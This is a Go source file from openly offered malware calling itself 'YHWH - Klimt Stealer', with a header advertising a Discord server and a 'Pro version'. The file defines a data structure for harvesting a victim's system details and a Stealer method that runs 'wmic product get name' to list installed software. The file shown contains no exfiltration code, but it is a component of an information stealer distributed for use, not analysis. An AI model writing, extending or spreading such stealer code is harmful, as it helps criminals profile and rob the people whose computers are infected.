// DO NOT EDIT THIS FILE!

// This program is a simplified version with lesser functionality in comparison to the Pro version.
// See the `YHWH - Klimt Stealer` Discord for further information: https://discord.gg/GMPfKuR3Tn

package main

import (
	"os/exec"
	"strings"
)

type Memory struct {
	TotalRAM          string
	FreeRAM           string
	BootDevice        string
	StorageCapacity   string
	InstalledSoftware []string
	Files             Files
}

// Need to rewrite as it takes too long to parse and increases runtime considerably
func (stealer *Stealer) GetInstalledSoftware() {
	// Executing the wmic command to get list of installed software
	out, err := exec.Command("wmic", "product", "get", "name").Output()
	if err != nil {
		return
	}

	// Parsing out the list of installed software from the wmic output
	for _, line := range strings.Split(string(out[:]), "\n") {

		if line == "" || strings.TrimSpace(line) == "" {
			continue
		}

		stealer.Memory.InstalledSoftware = append(stealer.Memory.InstalledSoftware, strings.TrimSpace(line))
	}
}
